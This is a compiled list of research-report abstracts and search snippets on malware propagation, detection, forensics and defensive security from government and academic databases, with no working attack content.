Cyber-infractions into a nation's strategic security envelope pose a constant and daunting challenge. We present the modular CyberSim tool which has been developed in response to the need to realistically simulate at a national level, software vulnerabilities and resulting mal ware propagation in online social networks. CyberSim suite (a) can generate realistic scale-free networks from a database of geocoordinated computers to closely model social networks arising from personal and business email contacts and online communities; (b) maintains for each,bost a list of installed software, along with the latest published vulnerabilities; (d) allows designated initial nodes where malware gets introduced; (e)more » simulates, using distributed discrete event-driven technology, the spread of malware exploiting a specific vulnerability, with packet delay and user online behavior models; (f) provides a graphical visualization of spread of infection, its severity, businesses affected etc to the analyst. We present sample simulations on a national level network with millions of computers.« less

Memory Analysis of the KBeast Linux Rootkit: Investigating Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

DTIC Science & Technology

2015-06-01

examine how a computer forensic investigator/incident handler, without specialised computer memory or software reverse engineering skills , can successfully...memory images and malware, this new series of reports will be directed at those who must analyse Linux malware-infected memory images. The skills ...disable 1287 1000 1000 /usr/lib/policykit-1-gnome/polkit-gnome-authentication- agent-1 1310 1000 1000 /usr/lib/pulseaudio/pulse/gconf- helper 1350

Binary CFG Rebuilt of Self-Modifying Codes

DTIC Science & Technology

2016-10-03

ABOVE ORGANIZATION. 1. REPORT DATE (DD-MM-YYYY)      04-10-2016 2. REPORT TYPE Final 3. DATES COVERED (From - To) 12 May 2014 to 11 May 2016 4. TITLE ...industry to analyze malware is a dynamic analysis in a sand- box . Alternatively, we apply a hybrid method combining concolic testing (dynamic symbolic...virus software based on binary signatures. A popular method in industry to analyze malware is a dynamic analysis in a sand- box . Alternatively, we

Building a Trusted Path for Applications Using COTS Components

DTIC Science & Technology

2004-11-01

against attacks by malicious software. Trojan horse programs, i.e., programs with additional hidden, often malicious, functions, are more and more...cannot be imitated by untrusted software." Wiseman et al. (1988) propose a user interface for the SMITE system to prevent Trojan horses from...input, two of which can also be used for the hologram service. 7.0 CONCLUSION Trojan horse programs, i.e., programs with additional hidden, often

Exe-Guard Project

DOE Office of Scientific and Technical Information (OSTI.GOV)

Smith, Rhett; Marshall, Tim; Chavez, Adrian

The exe-Guard Project is an alliance between Dominion Virginia Power (DVP), Sandia National Laboratories (SNL), Dartmouth University, and Schweitzer Engineering Laboratories (SEL). SEL is primary recipient on this project. The exe-Guard project was selected for award under DE-FOA-0000359 with CFDA number 81.122 to address Topic Area of Interest 4: Hardened platforms and Systems. The exe-Guard project developed an antivirus solution for control system embedded devices to prevent the execution of unauthorized code and maintain settings and configuration integrity. This project created a white list antivirus solution for control systems capable of running on embedded Linux® operating systems. White list antivirusmore » methods allow only credible programs to run through the use of digital signatures and hash functions. Once a system’s secure state is baselined, white list antivirus software denies deviations from that state because of the installation of malicious code as this changes hash results. Black list antivirus software has been effective in traditional IT environments but has negative implications for control systems. Black list antivirus uses pattern matching and behavioral analysis to identify system threats while relying on regular updates to the signature file and recurrent system scanning. Black list antivirus is vulnerable to zero day exploits which have not yet been incorporated into a signature file update. System scans hamper the performance of high availability applications, as revealed in NIST special publication 1058 which summarizes the impact of blacklist antivirus on control systems: Manual or “on-demand” scanning has a major effect on control processes in that they take CPU time needed by the control process (Sometimes close to 100% of CPU time). Minimizing the antivirus software throttle setting will reduce but not eliminate this effect. Signature updates can also take up to 100% of CPU time, but for a much shorter period than a typical manual scanning process. Control systems are vulnerable to performance losses if off-the-shelf blacklist antivirus solutions aren’t implemented with care. This investment in configuration in addition to constant decommissioning to perform manual signature file updates is unprecedented and impractical. Additionally, control systems are often disconnected or islanded from the network making the delivery of signature updates difficult. Exe-Guard project developed a white list antivirus solution that mitigated the above drawbacks and allows control systems to cost-effectively apply malware protection while maintaining high reliability. The application of security patches can also be minimized since white listing maintains constant defense against unauthorized code execution. Security patches can instead be applied in less frequent intervals where system decommissioning can be scheduled and planned for. Since control systems are less dynamic than IT environments, the feasibility of maintaining a secure baselined state is more practical. Because upgrades are performed in infrequent, calculated intervals, it allows a new security baseline to be established before the system is returned to service. Exe-Guard built on the efforts of SNL under the Code Seal project. SNL demonstrated prototype Trust Anchors on the project which are independent monitoring and control devices that can be integrated into untrustworthy components. The exe-Guard team started with the lessons learned under this project then designed commercial solution for white list malware protection. Malware is a real threat, even on islanded or un-networked installations, since operators can unintentionally install infected files, plug in infected mass storage devices, or infect a piece of equipment on the islanded local area network that can then spread to other connected equipment. Protection at the device level is one of the last layers of defense in a security-in-depth defense model before an asset becomes compromised. This project provided non-destructive intrusion, isolation and automated response solution, achieving a goal of the Department of Energy (DOE) Roadmap to Secure Control Systems. It also addressed CIP-007-R4 which requires asset owners to employ malicious software prevention tools on assets within the electronic security perimeter. In addition, the CIP-007-R3 requirement for security patch management is minimized because white listing narrows the impact of vulnerabilities and patch releases. The exe-Guard Project completed all tasks identified in the statement of project objective and identified additional tasks within scope that were performed and completed within the original budget. The cost share was met and all deliverables were successfully completed and submitted on time. Most importantly the technology developed and commercialized under this project has been adopted by the Energy sector and thousands of devices with exe-Guard technology integrated in them have now been deployed and are protecting our power systems today« less

Improving Remote Voting Security with CodeVoting

NASA Astrophysics Data System (ADS)

Joaquim, Rui; Ribeiro, Carlos; Ferreira, Paulo

One of the major problems that prevents the spread of elections with the possibility of remote voting over electronic networks, also called Internet Voting, is the use of unreliable client platforms, such as the voter's computer and the Internet infrastructure connecting it to the election server. A computer connected to the Internet is exposed to viruses, worms, Trojans, spyware, malware and other threats that can compromise the election's integrity. For instance, it is possible to write a virus that changes the voter's vote to a predetermined vote on election's day. Another possible attack is the creation of a fake election web site where the voter uses a malicious vote program on the web site that manipulates the voter's vote (phishing/pharming attack). Such attacks may not disturb the election protocol, therefore can remain undetected in the eyes of the election auditors.

Sandia National Laboratories: Malware Technical Exchange Meeting (MTEM)

Science.gov Websites

Cyber & Infrastructure Security Global Security Remote Sensing & Verification Research Research Against Malware Detection of Malware Malware Research Malware in Mobile Devices Malware Attack Trends Malware Malware Research Malware in Mobile Devices Malware Attack Trends Success Stories of COTS Products

IT Security Support for Spaceport Command and Control System

NASA Technical Reports Server (NTRS)

McLain, Jeffrey

2013-01-01

During the fall 2013 semester, I worked at the Kennedy Space Center as an IT Security Intern in support of the Spaceport Command and Control System under the guidance of the IT Security Lead Engineer. Some of my responsibilities included assisting with security plan documentation collection, system hardware and software inventory, and malicious code and malware scanning. Throughout the semester, I had the opportunity to work on a wide range of security related projects. However, there are three projects in particular that stand out. The first project I completed was updating a large interactive spreadsheet that details the SANS Institutes Top 20 Critical Security Controls. My task was to add in all of the new commercial of the shelf (COTS) software listed on the SANS website that can be used to meet their Top 20 controls. In total, there are 153 unique security tools listed by SANS that meet one or more of their 20 controls. My second project was the creation of a database that will allow my mentor to keep track of the work done by the contractors that report to him in a more efficient manner by recording events as they occur throughout the quarter. Lastly, I expanded upon a security assessment of the Linux machines being used on center that I began last semester. To do this, I used a vulnerability and configuration tool that scans hosts remotely through the network and presents the user with an abundance of information detailing each machines configuration. The experience I gained from working on each of these projects has been invaluable, and I look forward to returning in the spring semester to continue working with the IT Security team.

Using Malware Analysis to Tailor SQUARE for Mobile Platforms

DTIC Science & Technology

2014-11-01

identification data (SIM card and International Mobile Station Equipment Identity Number [IMEI]) to duplicate the phone in another device so that it can...applications. Key logging software can be used to steal passwords for financial websites and credit card information [Sophos 2014]. Data theft...for consumption. Apple provides a limited set of APIs and provides the iTunes store as the only ave- nue to install new software. All software

SHI(EL)DS: A Novel Hardware-Based Security Backplane to Enhance Security with Minimal Impact to System Operation

DTIC Science & Technology

2008-03-01

executables. The current roadblock to detecting Type I Malware consistantly is the practice of legitimate software , such as antivirus programs, using this... Software Security Systems . . 31 3.2.2 Advantages of Hardware . . . . . . . . . . . . . 32 3.2.3 Trustworthiness of Information . . . . . . . . . 33...Towards a Hardware Security Backplane . . . . . . . . . 42 IV. Review of State of the Art Computer Security Solutions . . . . . 46 4.1 Software

Physician use of updated anti-virus software in a tertiary Nigerian hospital.

PubMed

Laabes, E P; Nyango, D D; Ayedima, M M; Ladep, N G

2010-01-01

While physicians are becoming increasingly dependent on computers and the internet, highly lethal malware continue to be loaded into cyberspace. We sought to assess the proportion of physicians with updated anti-virus software in Jos University Teaching Hospital Nigeria and to determine perceived barriers to getting updates. We used a pre-tested semi-structured self-administered questionnaire to conduct a cross-sectional survey among 118 physicians. The mean age (+/- SD) of subjects was 34 (+/- 4) years, with 94 male and 24 female physicians. Forty-two (36.5%) of 115 physicians with anti-virus software used an updated program (95% Cl: 27, 45). The top-three antivirus software were: McAfee 40 (33.9%), AVG 37 (31.4%) and Norton 17 (14.4%). Common infections were: Trojan horse 22 (29.7%), Brontok worm 8 (10.8%), and Ravmonlog.exe 5 (6.8%). Internet browsing with a firewall was an independent determinant for use of updated anti-virus software [OR 4.3, 95% CI, 1.86, 10.02; P < 0.001]. Busy schedule, 40 (33.9%) and lack of credit card 39 (33.1%) were perceived barriers to updating antivirus software. The use of regularly updated anti-virus software is sub-optimal among physicians implying vulnerability to computer viruses. Physicians should be careful with flash drives and should avoid being victims of the raging arms race between malware producers and anti-virus software developers.

IT Security Support for the Spaceport Command Control Systems Development Ground Support Development Operations

NASA Technical Reports Server (NTRS)

Branch, Drew A.

2014-01-01

Security is one of the most if not the most important areas today. After the several attacks on the United States, security everywhere has heightened from airports to the communication among the military branches legionnaires. With advanced persistent threats (APT's) on the rise following Stuxnet, government branches and agencies are required, more than ever, to follow several standards, policies and procedures to reduce the likelihood of a breach. Attack vectors today are very advanced and are going to continue to get more and more advanced as security controls advance. This creates a need for networks and systems to be in an updated and secured state in a launch control system environment. FISMA is a law that is mandated by the government to follow when government agencies secure networks and devices. My role on this project is to ensure network devices and systems are in compliance with NIST, as outlined in FISMA. I will achieve this by providing assistance with security plan documentation and collection, system hardware and software inventory, malicious code and malware scanning, and configuration of network devices i.e. routers and IDS's/IPS's. In addition, I will be completing security assessments on software and hardware, vulnerability assessments and reporting, and conducting patch management and risk assessments. A guideline that will help with compliance with NIST is the SANS Top 20 Critical Controls. SANS Top 20 Critical Controls as well as numerous security tools, security software and the conduction of research will be used to successfully complete the tasks given to me. This will ensure compliance with FISMA and NIST, secure systems and a secured network. By the end of this project, I hope to have carried out the tasks stated above as well as gain an immense knowledge about compliance, security tools, networks and network devices, as well as policies and procedures.

IT Security Support for the Spaceport Command Control Systems Development Ground Support Development Operations

NASA Technical Reports Server (NTRS)

Branch, Drew

2013-01-01

Security is one of the most if not the most important areas today. After the several attacks on the United States, security everywhere was heightened from Airports to the communication among the military branches legionnaires. With advanced persistent threats (APTs) on the rise following Stuxnet, government branches and agencies are required, more than ever, to follow several standards, policies and procedures to reduce the likelihood of a breach. Attack vectors today are very advanced and are going to continue to get more and more advanced as security controls advance. This creates a need for networks and systems to be in an updated and secured state in a launch control system environment. FISMA is a law that is mandated by the government to follow when government agencies secure networks and devices. My role on this project is to ensure network devices and systems are in compliance with NIST, as outlined in FISMA. I will achieve this by providing assistance with security plan documentation and collection, system hardware and software inventory, malicious code and malware scanning and configuration of network devices i.e. routers and IDSsIPSs. In addition I will be completing security assessments on software and hardware, vulnerability assessments and reporting, conducting patch management and risk assessments. A guideline that will help with compliance with NIST is the SANS Top 20 Critical Controls. SANS Top 20 Critical Controls as well as numerous security tools, security software and the conduction of research will be used to successfully complete the tasks given to me. This will ensure compliance with FISMA and NIST, secure systems and a secured network. By the end of this project, I hope to have carried out stated above as well as gain an immense knowledge about compliance, security tools, networks and network devices, policies and procedures.

Operationalizing Cyberspace for Today’s Combat Air Force

DTIC Science & Technology

2010-04-01

rootkit techniques to run inside common Windows services (sometimes bundled with fake antivirus software ) or in Windows safe mode, and it can hide...has shifted to downloading other malware, with its main focus on fake alerts and rogue antivirus software . 5. TR/Dldr.Agent.JKH - Compromised U.S...patch, software update, or security breech away from failure. In short, what works AU/ACSC/SIMMONS/AY10 5 today, may not work tomorrow; this fact

Neural Detection of Malicious Network Activities Using a New Direct Parsing and Feature Extraction Technique

DTIC Science & Technology

2015-09-01

intrusion detection systems , neural networks 15. NUMBER OF PAGES 75 16. PRICE CODE 17. SECURITY CLASSIFICATION OF... detection system (IDS) software, which learns to detect and classify network attacks and intrusions through prior training data. With the added criteria of...BACKGROUND The growing threat of malicious network activities and intrusion attempts makes intrusion detection systems (IDS) a

Behavioral biometrics for verification and recognition of malicious software agents

NASA Astrophysics Data System (ADS)

Yampolskiy, Roman V.; Govindaraju, Venu

2008-04-01

Homeland security requires technologies capable of positive and reliable identification of humans for law enforcement, government, and commercial applications. As artificially intelligent agents improve in their abilities and become a part of our everyday life, the possibility of using such programs for undermining homeland security increases. Virtual assistants, shopping bots, and game playing programs are used daily by millions of people. We propose applying statistical behavior modeling techniques developed by us for recognition of humans to the identification and verification of intelligent and potentially malicious software agents. Our experimental results demonstrate feasibility of such methods for both artificial agent verification and even for recognition purposes.

Scalability Assessments for the Malicious Activity Simulation Tool (MAST)

DTIC Science & Technology

2012-09-01

the scalability characteristics of MAST. Specifically, we show that an exponential increase in clients using the MAST software does not impact...an exponential increase in clients using the MAST software does not impact network and system resources significantly. Additionally, we...31 1. Hardware .....................................31 2. Software .....................................32 3. Common PC

Code White: A Signed Code Protection Mechanism for Smartphones

DTIC Science & Technology

2010-09-01

analogous to computer security is the use of antivirus (AV) software . 12 AV software is a brute force approach to security. The software ...these users, numerous malicious programs have also surfaced. And while smartphones have desktop-like capabilities to execute software , they do not...11 2.3.1 Antivirus and Mobile Phones ............................................................... 11 2.3.2

REDIR: Automated Static Detection of Obfuscated Anti-Debugging Techniques

DTIC Science & Technology

2014-03-27

analyzing code samples that resist other forms of analysis. 2.5.6 RODS and HASTI: Software Engineering Cognitive Support Software Engineering (SE) is another...and (c) this method is resistant to common obfuscation techniques. To achieve this goal, the Data/Frame sensemaking theory guides the process of...No Starch Press, 2012. [46] C.-W. Hsu, S. W. Shieh et al., “Divergence Detector: A Fine-Grained Approach to Detecting VM-Awareness Malware,” in

Unique Approach to Threat Analysis Mapping: A Malware Centric Methodology for Better Understanding the Adversary Landscape

DTIC Science & Technology

2016-04-05

Unlimited http://www.sei.cmu.edu CMU/SEI-2016-TR-004 | SOFTWARE ENGINEERING INSTITUTE | CARNEGIE MELLON UNIVERSITY Distribution Statement A...Approved for Public Release; Distribution is Unlimited Copyright 2016 Carnegie Mellon University

 This material is based upon work funded and supported...by Department of Homeland Security under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software

CrossTalk. The Journal of Defense Software Engineering. Volume 25, Number 2

DTIC Science & Technology

2012-04-01

attacks is expanding to engulf the compact world of smartphones . by Aditya K. Sood and Richard J. Enbody A Practical Approach to Securing and Managing...provide a vulnerable entry point to our mobile device informa- tion systems. As a result, hackers are able to quickly exploit software on smartphones ...MOBILE WORLD 4 CrossTalk—March/April 2012 Abstract. The sphere of malware attacks is expanding to engulf the compact world of smartphones . This paper

Prospects for Evidence -Based Software Assurance: Models and Analysis

DTIC Science & Technology

2015-09-01

virtual machine is much lighter than the workstation. The virtual machine doesn’t need to run anti- virus , firewalls, intrusion preven- tion systems...34] Maiorca, D., Corona , I., and Giacinto, G. Looking at the bag is not enough to find the bomb: An evasion of structural methods for malicious PDF...CCS ’13, ACM, pp. 119–130. [35] Maiorca, D., Giacinto, G., and Corona , I. A pattern recognition system for malicious PDF files detection. In

A Study and Taxonomy of Vulnerabilities in Web Based Animation and Interactivity Software

DTIC Science & Technology

2010-12-01

Flash Player is available as a plugin for most common Web browsers (Firefox, Mozilla, Netscape, Opera) and as an ActiveX control for Internet...script or HTML via (1) a swf file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX ...malicious page or open a malicious file. 2. Coding an Exploit The specific flaw exists in the Flash Player ActiveX Control’s handling of the

Modeling the propagation of mobile malware on complex networks

NASA Astrophysics Data System (ADS)

Liu, Wanping; Liu, Chao; Yang, Zheng; Liu, Xiaoyang; Zhang, Yihao; Wei, Zuxue

2016-08-01

In this paper, the spreading behavior of malware across mobile devices is addressed. By introducing complex networks to model mobile networks, which follows the power-law degree distribution, a novel epidemic model for mobile malware propagation is proposed. The spreading threshold that guarantees the dynamics of the model is calculated. Theoretically, the asymptotic stability of the malware-free equilibrium is confirmed when the threshold is below the unity, and the global stability is further proved under some sufficient conditions. The influences of different model parameters as well as the network topology on malware propagation are also analyzed. Our theoretical studies and numerical simulations show that networks with higher heterogeneity conduce to the diffusion of malware, and complex networks with lower power-law exponents benefit malware spreading.

Visualization techniques for malware behavior analysis

NASA Astrophysics Data System (ADS)

Grégio, André R. A.; Santos, Rafael D. C.

2011-06-01

Malware spread via Internet is a great security threat, so studying their behavior is important to identify and classify them. Using SSDT hooking we can obtain malware behavior by running it in a controlled environment and capturing interactions with the target operating system regarding file, process, registry, network and mutex activities. This generates a chain of events that can be used to compare them with other known malware. In this paper we present a simple approach to convert malware behavior into activity graphs and show some visualization techniques that can be used to analyze malware behavior, individually or grouped.

Using Semantic Templates to Study Vulnerabilities Recorded in Large Software Repositories

ERIC Educational Resources Information Center

Wu, Yan

2011-01-01

Software vulnerabilities allow an attacker to reduce a system's Confidentiality, Availability, and Integrity by exposing information, executing malicious code, and undermine system functionalities that contribute to the overall system purpose and need. With new vulnerabilities discovered everyday in a variety of applications and user environments,…

Cyber Strategic Inquiry: Enabling Change through a Strategic Simulation and Megacommunity Concept

DTIC Science & Technology

2009-02-01

malicious software embedded in thumb drives and CDs that thwarted protections, such as antivirus software , on computers. In the scenario, these...Executives for National Security • The Carlyle Group • Cassat Corporation • Cisco Systems, Inc. • Cyveillance • General Dynamics • General Motors

Accurate mobile malware detection and classification in the cloud.

PubMed

Wang, Xiaolei; Yang, Yuexiang; Zeng, Yingzhi

2015-01-01

As the dominator of the Smartphone operating system market, consequently android has attracted the attention of s malware authors and researcher alike. The number of types of android malware is increasing rapidly regardless of the considerable number of proposed malware analysis systems. In this paper, by taking advantages of low false-positive rate of misuse detection and the ability of anomaly detection to detect zero-day malware, we propose a novel hybrid detection system based on a new open-source framework CuckooDroid, which enables the use of Cuckoo Sandbox's features to analyze Android malware through dynamic and static analysis. Our proposed system mainly consists of two parts: anomaly detection engine performing abnormal apps detection through dynamic analysis; signature detection engine performing known malware detection and classification with the combination of static and dynamic analysis. We evaluate our system using 5560 malware samples and 6000 benign samples. Experiments show that our anomaly detection engine with dynamic analysis is capable of detecting zero-day malware with a low false negative rate (1.16 %) and acceptable false positive rate (1.30 %); it is worth noting that our signature detection engine with hybrid analysis can accurately classify malware samples with an average positive rate 98.94 %. Considering the intensive computing resources required by the static and dynamic analysis, our proposed detection system should be deployed off-device, such as in the Cloud. The app store markets and the ordinary users can access our detection system for malware detection through cloud service.

Model and Dynamic Behavior of Malware Propagation over Wireless Sensor Networks

NASA Astrophysics Data System (ADS)

Song, Yurong; Jiang, Guo-Ping

Based on the inherent characteristics of wireless sensor networks (WSN), the dynamic behavior of malware propagation in flat WSN is analyzed and investigated. A new model is proposed using 2-D cellular automata (CA), which extends the traditional definition of CA and establishes whole transition rules for malware propagation in WSN. Meanwhile, the validations of the model are proved through theoretical analysis and simulations. The theoretical analysis yields closed-form expressions which show good agreement with the simulation results of the proposed model. It is shown that the malware propaga-tion in WSN unfolds neighborhood saturation, which dominates the effects of increasing infectivity and limits the spread of the malware. MAC mechanism of wireless sensor networks greatly slows down the speed of malware propagation and reduces the risk of large-scale malware prevalence in these networks. The proposed model can describe accurately the dynamic behavior of malware propagation over WSN, which can be applied in developing robust and efficient defense system on WSN.

Fractals, malware, and data models

NASA Astrophysics Data System (ADS)

Jaenisch, Holger M.; Potter, Andrew N.; Williams, Deborah; Handley, James W.

2012-06-01

We examine the hypothesis that the decision boundary between malware and non-malware is fractal. We introduce a novel encoding method derived from text mining for converting disassembled programs first into opstrings and then filter these into a reduced opcode alphabet. These opcodes are enumerated and encoded into real floating point number format and used for characterizing frequency of occurrence and distribution properties of malware functions to compare with non-malware functions. We use the concept of invariant moments to characterize the highly non-Gaussian structure of the opcode distributions. We then derive Data Model based classifiers from identified features and interpolate and extrapolate the parameter sample space for the derived Data Models. This is done to examine the nature of the parameter space classification boundary between families of malware and the general non-malware category. Preliminary results strongly support the fractal boundary hypothesis, and a summary of our methods and results are presented here.

Establishing Malware Attribution and Binary Provenance Using Multicompilation Techniques

DOE Office of Scientific and Technical Information (OSTI.GOV)

Ramshaw, M. J.

2017-07-28

Malware is a serious problem for computer systems and costs businesses and customers billions of dollars a year in addition to compromising their private information. Detecting malware is particularly difficult because malware source code can be compiled in many different ways and generate many different digital signatures, which causes problems for most anti-malware programs that rely on static signature detection. Our project uses a convolutional neural network to identify malware programs but these require large amounts of data to be effective. Towards that end, we gather thousands of source code files from publicly available programming contest sites and compile themmore » with several different compilers and flags. Building upon current research, we then transform these binary files into image representations and use them to train a long-term recurrent convolutional neural network that will eventually be used to identify how a malware binary was compiled. This information will include the compiler, version of the compiler and the options used in compilation, information which can be critical in determining where a malware program came from and even who authored it.« less

Machine Learning Based Malware Detection

DTIC Science & Technology

2015-05-18

A TRIDENT SCHOLAR PROJECT REPORT NO. 440 Machine Learning Based Malware Detection by Midshipman 1/C Zane A. Markel, USN...COVERED (From - To) 4. TITLE AND SUBTITLE Machine Learning Based Malware Detection 5a. CONTRACT NUMBER 5b. GRANT NUMBER 5c. PROGRAM...suitably be projected into realistic performance. This work explores several aspects of machine learning based malware detection . First, we

A Study of Malware Propagation via Online Social Networking

NASA Astrophysics Data System (ADS)

Faghani, Mohammad Reza; Nguyen, Uyen Trang

The popularity of online social networks (OSNs) have attracted malware creators who would use OSNs as a platform to propagate automated worms from one user's computer to another's. On the other hand, the topic of malware propagation in OSNs has only been investigated recently. In this chapter, we discuss recent advances on the topic of malware propagation by way of online social networking. In particular, we present three malware propagation techniques in OSNs, namely cross site scripting (XSS), Trojan and clickjacking types, and their characteristics via analytical models and simulations.

Protecting software agents from malicious hosts using quantum computing

NASA Astrophysics Data System (ADS)

Reisner, John; Donkor, Eric

2000-07-01

We evaluate how quantum computing can be applied to security problems for software agents. Agent-based computing, which merges technological advances in artificial intelligence and mobile computing, is a rapidly growing domain, especially in applications such as electronic commerce, network management, information retrieval, and mission planning. System security is one of the more eminent research areas in agent-based computing, and the specific problem of protecting a mobile agent from a potentially hostile host is one of the most difficult of these challenges. In this work, we describe our agent model, and discuss the capabilities and limitations of classical solutions to the malicious host problem. Quantum computing may be extremely helpful in addressing the limitations of classical solutions to this problem. This paper highlights some of the areas where quantum computing could be applied to agent security.

A malware detection scheme based on mining format information.

PubMed

Bai, Jinrong; Wang, Junfeng; Zou, Guozhong

2014-01-01

Malware has become one of the most serious threats to computer information system and the current malware detection technology still has very significant limitations. In this paper, we proposed a malware detection approach by mining format information of PE (portable executable) files. Based on in-depth analysis of the static format information of the PE files, we extracted 197 features from format information of PE files and applied feature selection methods to reduce the dimensionality of the features and achieve acceptable high performance. When the selected features were trained using classification algorithms, the results of our experiments indicate that the accuracy of the top classification algorithm is 99.1% and the value of the AUC is 0.998. We designed three experiments to evaluate the performance of our detection scheme and the ability of detecting unknown and new malware. Although the experimental results of identifying new malware are not perfect, our method is still able to identify 97.6% of new malware with 1.3% false positive rates.

A Malware Detection Scheme Based on Mining Format Information

PubMed Central

Bai, Jinrong; Wang, Junfeng; Zou, Guozhong

2014-01-01

Malware has become one of the most serious threats to computer information system and the current malware detection technology still has very significant limitations. In this paper, we proposed a malware detection approach by mining format information of PE (portable executable) files. Based on in-depth analysis of the static format information of the PE files, we extracted 197 features from format information of PE files and applied feature selection methods to reduce the dimensionality of the features and achieve acceptable high performance. When the selected features were trained using classification algorithms, the results of our experiments indicate that the accuracy of the top classification algorithm is 99.1% and the value of the AUC is 0.998. We designed three experiments to evaluate the performance of our detection scheme and the ability of detecting unknown and new malware. Although the experimental results of identifying new malware are not perfect, our method is still able to identify 97.6% of new malware with 1.3% false positive rates. PMID:24991639

A Software Assurance Framework for Mitigating the Risks of Malicious Software in Embedded Systems Used in Aircraft

DTIC Science & Technology

2011-09-01

to show cryptographic signature # generation on a UNIX system # SHA=/bin/ sha256 CSDB=/tmp/csdb CODEBASE=. touch "$CSDB" find "$CODEBASE" -type f...artifacts generated earlier. 81 #! /bin/sh # # Demo program to show cryptographic signature # verification on a UNIX system # SHA=/bin/ sha256 CSDB=/tmp

SEI Innovation Center Report: Cyber Intelligence Tradecraft Project: Summary of Key Findings

DTIC Science & Technology

2013-01-01

source news, social media ), and focuses collection on the pertinent threats and strategic needs analysts identify while learning about their...difficult to correlate with other data sources (network data, social media , chat rooms, geopolitical news sites) and complicates trend analysis or...use of commonly exploited software, prohibiting USB storage devices, and impeding access to websites associated with scams and malware make it very

Lessons Learned in Cyberspace Security

DTIC Science & Technology

2014-06-01

software; something undesirable is packaged together with something desirable. A classic example was Elf Bowling attachment, which ran rampant through...the authors’ former school. It combined a fun program featuring elves as bowling pins, however it was packaged with SubSeven (Sub7) malware that...allowed remote access to the infected machine. IExpress, which is delivered in the Windows OS, is one of the legitimate tools for packaging multiple

Comprehension-Driven Program Analysis (CPA) for Malware Detection in Android Phones

DTIC Science & Technology

2015-07-01

COMPREHENSION-DRIVEN PROGRAM ANALYSIS (CPA) FOR MALWARE DETECTION IN ANDROID PHONES IOWA STATE UNIVERSITY JULY 2015 FINAL...DRIVEN PROGRAM ANALYSIS (CPA) FOR MALWARE DETECTION IN ANDROID PHONES Sb. GRANT NUMBER N/A Sc. PROGRAM ELEMENT NUMBER 6 1101E 6. AUTHOR(S) Sd...machine analysis system to detect novel, sophisticated Android malware. (c) An innovative library summarization technique and its incorporation in

CyberTerrorism: Cyber Prevention vs Cyber Recovery

DTIC Science & Technology

2007-12-01

appropriate available security measures (i.e. appropriate level of spy ware, IDS, and antivirus protection software installed) are unaffected by worm attacks...a worm is a form of a virus designed to copy itself by utilizing e-mail or other software applications. The main goal of using this technique is...to permeate the network or portions of the Internet with malicious code that will affect the performance of certain software applications or will

Modeling Security Aspects of Network

NASA Astrophysics Data System (ADS)

Schoch, Elmar

With more and more widespread usage of computer systems and networks, dependability becomes a paramount requirement. Dependability typically denotes tolerance or protection against all kinds of failures, errors and faults. Sources of failures can basically be accidental, e.g., in case of hardware errors or software bugs, or intentional due to some kind of malicious behavior. These intentional, malicious actions are subject of security. A more complete overview on the relations between dependability and security can be found in [31]. In parallel to the increased use of technology, misuse also has grown significantly, requiring measures to deal with it.

Survey of Malware Threats and Recommendations to Improve Cybersecurity for Industrial Control Systems Version 1.0

DTIC Science & Technology

2015-02-01

not normally blocked by enterprise firewalls . • Some malware exploited zero-day vulnerabilities as well as attempted to exploit vulnerabilities for...servers, receiving updates, and exfiltrating data. Firewalls are routinely configured to block incoming connections while malware within a target...implemented with layers of technical security controls (e.g., ICS-aware firewalls ) to control network traffic and prevent the spread of malware . Intrusion

Malware analysis using visualized image matrices.

PubMed

Han, KyoungSoo; Kang, BooJoong; Im, Eul Gyu

2014-01-01

This paper proposes a novel malware visual analysis method that contains not only a visualization method to convert binary files into images, but also a similarity calculation method between these images. The proposed method generates RGB-colored pixels on image matrices using the opcode sequences extracted from malware samples and calculates the similarities for the image matrices. Particularly, our proposed methods are available for packed malware samples by applying them to the execution traces extracted through dynamic analysis. When the images are generated, we can reduce the overheads by extracting the opcode sequences only from the blocks that include the instructions related to staple behaviors such as functions and application programming interface (API) calls. In addition, we propose a technique that generates a representative image for each malware family in order to reduce the number of comparisons for the classification of unknown samples and the colored pixel information in the image matrices is used to calculate the similarities between the images. Our experimental results show that the image matrices of malware can effectively be used to classify malware families both statically and dynamically with accuracy of 0.9896 and 0.9732, respectively.

Measuring Cyber Operations Effectiveness

DTIC Science & Technology

2014-11-01

are advanced firewalls capable of taking limited action to block malicious traffic or hacking attempts. Their capabilities vary widely and must be...using many automated tools, included in the defense hardware and software itself. These devices include hardware and software firewalls , Network...DoD networks are probed millions of times per day…the Air Force blocks roughly two billion threats and denies two million emails each week

Detection and Prevention of Android Malware Attempting to Root the Device

DTIC Science & Technology

2014-03-01

detect the operation of malware trying to root the phone. This research aims to detect the Exploid, RageAgainstTheCage, and Gingerbreak exploits on...attackers can use malware to root the system. By placing sensors inside the critical paths, the research detected all 379 malware samples trying the root...zero false positive results. Unlike static signature detection at the application level, this research provides dynamic detection at the kernel level

Sweetening Android Lemon Markets: Measuring and Curbing Malware in Application Marketplaces

DTIC Science & Technology

2012-06-08

the main software distribution mechanism for modern mobile devices but are also emerging as a viable alternative to brick -and- mortar stores for...mechanism for modern mobile devices but are also emerging as a viable alternative to brick -and- mortar stores for personal computers. While most...through the Apple App Store , thereby entirely forgoing the traditional distribution channel – packaged opti- cal media sold in brick -and- mortar

Protecting Dynamic Mobile Agent against Denial of Service Attacks

NASA Astrophysics Data System (ADS)

Aggarwal, Mayank; Nipur, Pallavi

2010-11-01

Mobile Agents are softwares migrating from one node to another to fulfill the task of its owner. The introduction of mobile agents has reduced network latency, network traffic a lot but at the same time it has increased the vulnerability for attacks by malicious hosts. One such attack is `Denial of Service', once the agent is launched it is free to roam without any control of its owner, this on one hand decreases the cost of agent—owner interaction and on the other hand increases the chances of `Denial Of Service'. In Denial Of Service attack the malicious host may deny resources required by the agent and kill the agent, thus the result computed so far is lost and this may happen every time the agent visits any malicious host. In this paper we continued the work done in [10] in which the authors proposed techniques by which owner can detect the malicious host for `Denial Of Service' but they did not covered technique for dynamic routes i.e. where the host or agent initiate migrations to hosts which were not contained in the route composed by the owner. We introduced an algorithm and a model which can be useful for the above purpose.

Entropyology: the application of bioinformatics and data modeling to digital virus and malware recognition

NASA Astrophysics Data System (ADS)

Jaenisch, Holger M.; Handley, James W.

2010-04-01

